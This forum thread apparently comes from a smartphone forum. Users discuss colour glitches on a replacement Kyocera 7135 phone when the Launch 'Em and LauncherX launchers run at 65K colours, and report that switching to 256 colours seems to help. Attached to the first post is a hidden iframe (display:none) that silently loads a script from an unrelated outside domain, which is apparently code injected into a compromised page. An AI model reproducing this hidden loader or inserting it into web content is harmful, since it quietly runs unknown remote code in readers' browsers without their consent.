+ Reply to Thread

Thread: Color Problems

Color Problems

I recently got a replacement unit from Kyocera and this phone seems to be doing something that I haven't seen mentioned yet. On numerous occasions the color becomes distorted (I'm not talking about an inverted screen). For example, today in the phone application the bar under "Main Menu" was an orange/tan instead of the standard blue. After a while it corrected itself to the normal blue. Also, in Launch 'Em at times the entire screen turns white (nothing is visible) and then when it returns the icons have changed to black. After a while this also corrects itself. I'm running both Launch 'Em and LauncherX in 65K colors and wonder whether that could have anything to do with it. Any thoughts?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I have seen variations in color before, but not with those apps, and not often at all.

Originally posted by HoTSynC
    I have seen variations in color before, but not with those apps, and not often at all.
    Are the variations that you've seen related to light/dark issues (but at least the same color) or have you also seen completely different colors at times in some applications? I assume there is no fix for this, but I'm going to call Kyo anyway. What's weird is that I never experienced this on my prior 7135. I'm really wondering whether the 65K setting in the launcher apps has anything to do with it. I may return to 256 colors since I don't seem to notice any difference anyway.

It sounds like you need another replacement. How does it appear using the default launcher?
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135

Originally posted by Beryl
    It sounds like you need another replacement. How does it appear using the default launcher?
    I changed both LauncherX and Launch 'Em to 256 colors and haven't had a problem since (although it's only been one day). HotSync is running LauncherX with 65K colors and also indicated a minor icon problem so I think it may be related to that. In fact, after I changed Launch 'Em to 256 colors it won't even allow me to pick 65k colors (the option remains, but each time I try to select it it still keeps 256). As with you Beryl, I don't see a difference anyway. One thing I was wondering, if you choose 256 colors with the launcher program, will that affect the number of colors in other programs? My guess is no, but I was wondering if anyone knows.